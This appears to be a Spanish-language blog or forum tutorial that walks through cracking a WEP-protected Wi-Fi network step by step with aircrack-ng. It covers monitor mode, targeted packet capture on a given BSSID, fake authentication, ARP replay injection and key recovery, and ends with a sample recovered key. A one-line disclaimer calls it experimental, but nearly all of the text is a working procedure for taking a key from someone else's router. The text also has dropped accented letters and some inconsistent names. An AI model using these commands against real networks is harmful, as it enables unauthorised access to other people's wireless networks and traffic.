Recuerden, esto es slo una prueba experimental y en ningn momento se trata de incurrir en abrir espacios privados.

Les dejo este peque-tutorial, minigua, paso a paso. Ojal les sirva. Desde lnea de comandos, para cifrado wep: sudo apt-get install aircrack-ng Antes que todo debes desconectarte de cualquier red y desactivar la red, slo dejar encendida, por supuesto, la tarjeta wifi. Vemos nuestras tarjetas wifi con: iwconfig Paramos (stop-stop-stop. target!!!) nuestra tarjeta (en mi caso es el nombre wlan0) tarjeta para ir al modo monitor: sudo airmon-ng stop wlan0 Activamos nuestra tarjeta en modo monitor (a volar): sudo airmon-ng start wlan0 Ahora le decimos que monitor todas las redes cercanas, ya en modo monitor (mn0). De preferencia deben ser redes que tengan buena seal y estn por arriba del valor 50: sudo airodump-ng mon0 Fjate bien en dos datos del modem de internet al que le sacaremos la clave y que ahora debes ver en tu shell o terminal Linux, porque necesitaremos esos datos. Primero, el canal en donde est, en mi caso fue el 11, y el bssid, que es el que se muestra. Debes cambiar esos dos valores al que quieres interceptar. Le decimos que escriba (-w) un archivo que se fraccionar en cuatro llamado captura en la carpeta donde abriste tu shell. Puedes cambiar el nombre captura y ponerle el que quieras, tal vez el nombre de tu mascota o bakara (ese es muy efectivo), Con la tecla control y la letra C, a la vez, paramos el monitoreo -esto es importante- Abrimos otra terminal y seguimos: sudo airodump-ng --channel 11 --bssid 00:0D:72:27:AE:D1 -w captura mon0 Abres otra terminal y dejas trabajando la anterior. Escribes el nombre de la red que quieres tronar en el espacio "WIRE256" que fuen la que utilic. LO dems lo dejamos tal cual, y si te fijas damos un bsssid falso para bajar paquetes: sudo aireplay-ng -1 0 -e 2WIRE256 -a 00:0D:72:27:AE:D1 -h 11:22:33:44:55:66 mon0 Abrimos otra terminal y escribimos otra vez (cambia solamente en esta lnea de comandos el valor de la bssid por el que manejas ahora): sudo aireplay-ng -3 -b 00:0D:72:27:AE:D1 -h 11:22:33:44:55:66 mon0 Te debe dar unos 15 mil ARP y ms de 100mil hacks para que funcione. Cuando los tengas, abres otra terminal y escribes para desencriptar los paquetes: sudo aircrack-ng -z *.cap Al final de la shell debe quedar as: KEY FOUND! [ 12:78:12:78:12 ] Decrypted correctly: 100% Es decir, la clave es 1278127812